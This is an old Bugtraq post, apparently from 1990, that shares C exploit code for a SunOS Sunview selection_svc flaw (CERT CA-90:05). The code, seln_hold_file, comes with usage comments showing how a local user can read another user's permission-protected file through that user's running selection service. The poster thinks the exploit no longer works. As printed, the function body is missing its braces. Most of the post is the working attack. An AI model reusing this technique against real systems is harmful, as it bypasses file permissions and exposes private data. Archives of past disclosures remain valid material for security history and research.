**************************************************************************
   HACK: Very old selection_svc exploit, CA-90:05
 System: SunOS, not Solaris
 Source: Bonfield James (jkb@mrc-lmb.cam.ac.uk)post to Bugtraq
   Date: 1990
**************************************************************************


Well I've got some code that's been kicking around for years (5 or so maybe),
that exploits a Sunview selection_svc problem. I doubt if it's the same bug as
more recent selection_svc holes, but I do wonder whether people ever learn
from past problems. I doubt this code works anymore as I doubt anyone uses
Sunview these days.

Anyway, thanks to James Beckett (Hiya James!) from whom I snarfed this code
oh so long ago. I would leave it up to James to post this code, but I
have a feeling he may not have it anymore.

        James

/* SELN_HOLD_FILE
 * For use where someone has a selection_svc runnning as them, after an
 * invocation of suntools:
 *
 * % cat their_private_file
 * their_private_file: Permission denied
 * % cc seln_hold_file.c -o seln_hold_file -lsuntool -lsunwindow
 * % ./seln_hold_file their_private_file
 * % get_selection 2
 * < contents of their_private_file >
 * %
 */

#include <stdio.h>
#include <sys/types.h>
#include <suntool/seln.h>

main(argc, argv)
  int argc;
  char *argv[];

  Seln_result     ret;

  if (argc != 2) {
    (void) fprintf(stderr, "usage: seln_grab file1\n");
    exit(1);
  }

  ret = seln_hold_file(SELN_SECONDARY, argv[1]);
  seln_dump_result(stdout, &ret);
  printf("\n");


/*
 * Local variables:
 * compile-command: "cc -sun3 -Bstatic -o seln_hold_file seln_hold_file.c -lsuntool -lsunwindow"
 * end:
 *
 * Static required because _mem_ops not included in ld.so
 */